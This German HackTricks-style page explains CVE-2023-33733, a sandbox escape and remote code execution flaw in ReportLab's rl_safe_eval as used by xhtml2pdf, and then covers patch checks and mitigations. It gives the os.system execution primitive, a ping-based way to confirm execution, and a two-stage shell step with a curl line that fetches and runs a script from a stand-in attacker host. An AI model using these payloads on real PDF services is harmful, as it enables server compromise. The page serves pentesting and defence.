ReportLab/xhtml2pdf [[[…]]] expression-evaluation RCE (CVE-2023-33733)

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Diese Seite dokumentiert eine praktische Sandbox-Escape- und RCE-Primitive in ReportLab’s rl_safe_eval, die von xhtml2pdf und anderen PDF-Generierungs-Pipelines verwendet wird, wenn benutzergesteuerte HTML-Inhalte in PDFs gerendert werden.

CVE-2023-33733 betrifft ReportLab-Versionen bis einschließlich 3.6.12. In bestimmten Attribut-Kontexten (z. B. color) werden Werte, die in triple brackets [[[ … ]]] eingeschlossen sind, serverseitig von rl_safe_eval ausgewertet. Durch das Konstruieren einer Nutzlast, die von einem zugelassenen builtin (pow) zu dessen Python-Funktions-Globals pivotiert, kann ein Angreifer das os-Modul erreichen und Befehle ausführen.

Wesentliche Punkte

  • Auslöser: injiziere [[[ … ]]] in ausgewertete Attribute wie innerhalb von Markup, das von ReportLab/xhtml2pdf geparst wird.
  • Sandbox: rl_safe_eval ersetzt gefährliche builtins, aber ausgewertete Funktionen offenbaren weiterhin globals.
  • Umgehung: Erzeuge eine transiente Klasse Word, um rl_safe_eval Namensprüfungen zu umgehen und den String “globals” zu erreichen, während geblockte dunder-Filter umgangen werden.
  • RCE: getattr(pow, Word('__globals__'))['os'].system('<cmd>')
  • Stabilität: Gib nach der Ausführung einen gültigen Attributwert zurück (für color z. B. ‘red’).

Wann testen

  • Anwendungen, die HTML-zu-PDF-Export anbieten (Profile, Rechnungen, Berichte) und xhtml2pdf/ReportLab in PDF-Metadaten oder HTTP-Response-Kommentaren anzeigen.
  • exiftool profile.pdf | egrep ‘Producer|Title|Creator’ → “xhtml2pdf” producer
  • HTTP-Response für PDF beginnt oft mit einem ReportLab Generator-Kommentar

Wie die Sandbox-Umgehung funktioniert

  • rl_safe_eval entfernt oder ersetzt viele builtins (getattr, type, pow, …) und wendet Namensfilter an, die Attribute verbieten, die mit __ beginnen oder in einer Denylist stehen.
  • Sichere Funktionen leben jedoch in einem globals-Dictionary, das über func.globals zugänglich ist.
  • Verwende type(type(1)), um die echte eingebaute type-Funktion wiederherzustellen (um die ReportLab-Wrapper zu umgehen), und definiere dann eine Word-Klasse, die von str ableitet und ein verändertes Vergleichsverhalten hat, sodass:
    • .startswith(‘’) → immer False (um die startswith(‘’) Namensprüfung zu umgehen)
    • .eq gibt beim ersten Vergleich False zurück (um Denylist-Mitgliedschaftsprüfungen zu umgehen) und danach True (damit Python getattr funktioniert)
    • .hash entspricht hash(str(self))
  • Damit gibt getattr(pow, Word(‘globals’)) das globals-Dict der umschlossenen pow-Funktion zurück, das ein importiertes os-Modul enthält. Dann: ['os'].system('<cmd>').

Minimales Exploit-Muster (Attribut-Beispiel) Platziere die Nutzlast in einem ausgewerteten Attribut und stelle sicher, dass sie nach der Ausführung einen gültigen Attributwert zurückgibt, z. B. über boolean und ‘red’.

exploit

  • Die List-Comprehension-Form erlaubt einen einzigen Ausdruck, den rl_safe_eval akzeptiert.
  • Das nachgestellte and ‘red’ liefert eine gültige CSS-Farbe, sodass das Rendering nicht fehlschlägt.
  • Ersetze den Befehl nach Bedarf; verwende ping, um die Ausführung mit tcpdump zu verifizieren.

Betriebsablauf

  1. PDF-Generator identifizieren
  • PDF Producer zeigt xhtml2pdf; HTTP-Response enthält ReportLab-Kommentar.
  1. Finde eine Eingabe, die ins PDF reflektiert wird (z. B. Profil-Bio/-Beschreibung) und löse einen Export aus.
  2. Verifikation der Ausführung mit leisem ICMP
  • Ausführen: sudo tcpdump -ni <iface> icmp
  • Nutzlast: … system('ping <your_ip>')
  • Windows sendet oft standardmäßig genau vier Echo-Requests.
  1. Shell etablieren
  • Für Windows ist ein zuverlässiger Two-Stage-Ansatz empfehlenswert, um Quoting-/Encoding-Probleme zu vermeiden:
  • Stage 1 (Download):

exploit

  • Stage 2 (Ausführen):

exploit

  • Für Linux-Ziele ist ein ähnliches Two-Stage-Verfahren mit curl/wget möglich:
  • system(‘curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s’)

Hinweise und Tipps

  • Attribut-Kontexte: color ist ein bekannter ausgewerteter Attribut-Kontext; andere Attribute in ReportLab-Markup können ebenfalls Ausdrücke auswerten. Wenn ein Standort sanitisiert ist, probiere andere Orte im PDF-Flow (verschiedene Felder, Tabellenstile, etc.).
  • Quoting: Halte Befehle kompakt. Two-Stage-Downloads reduzieren erheblich die Probleme mit Quoting und Escaping.
  • Zuverlässigkeit: Wenn Exporte gecached oder in Queues verarbeitet werden, variiere die Nutzlast leicht (z. B. zufälliger Pfad oder Query), um Cache-Treffer zu vermeiden.

Patch-Status (2024–2025) und Erkennung von Backports

  • 3.6.13 (27 Apr 2023) schrieb colors.toColor als AST-walk Parser neu; neuere 4.x-Releases behalten diesen Pfad bei. Das Erzwingen von rl_settings.toColorCanUse auf rl_safe_eval oder rl_extended_literal_eval reaktiviert den verwundbaren Evaluator selbst in aktuellen Versionen.
  • Einige Distributionen liefern Backports der Fixes, behalten aber Versionsnummern wie 3.6.12-1+deb12u1; verlasse dich nicht allein auf die semantische Version. Grep colors.py nach ast.parse oder inspiziere toColor zur Laufzeit, um sicherzustellen, dass der AST-basierte Parser verwendet wird (siehe Quick-Check unten).
  • Schnelle lokale Prüfung, ob der AST-basierte Fix vorhanden ist:
python - <<'PY'
import inspect
from reportlab.lib import colors
src = inspect.getsource(colors.toColor)
print('AST-based toColor' if 'ast.parse' in src else 'rl_safe_eval still reachable')
PY

Minderungsmaßnahmen und Erkennung

  • Aktualisiere ReportLab auf 3.6.13 oder neuer (CVE-2023-33733 behoben). Verfolge auch Sicherheitshinweise in den Distributionspaketen.
  • Speise benutzerkontrolliertes HTML/Markup nicht direkt in xhtml2pdf/ReportLab ein, ohne strikte Bereinigung (Sanitization). Entferne/lehne [[[…]]] Evaluationskonstrukte und herstellerspezifische Tags ab, wenn die Eingabe nicht vertrauenswürdig ist.
  • Erwäge, die Verwendung von rl_safe_eval für nicht vertrauenswürdige Eingaben vollständig zu deaktivieren oder zu kapseln.
  • Überwache verdächtige ausgehende Verbindungen während der PDF-Erstellung (z. B. ICMP/HTTP von App-Servern beim Exportieren von Dokumenten).

References

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks